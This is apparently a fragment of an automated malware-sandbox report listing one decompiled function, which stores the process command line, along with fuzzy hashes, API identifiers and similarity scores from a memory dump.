            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



            0x0040557b
            0x00405586
            0x0040558d

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CommandLine
            • String ID: 5k
            • API String ID: 3253501508-3210601876
            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
            Uniqueness

            Uniqueness Score: -1.00%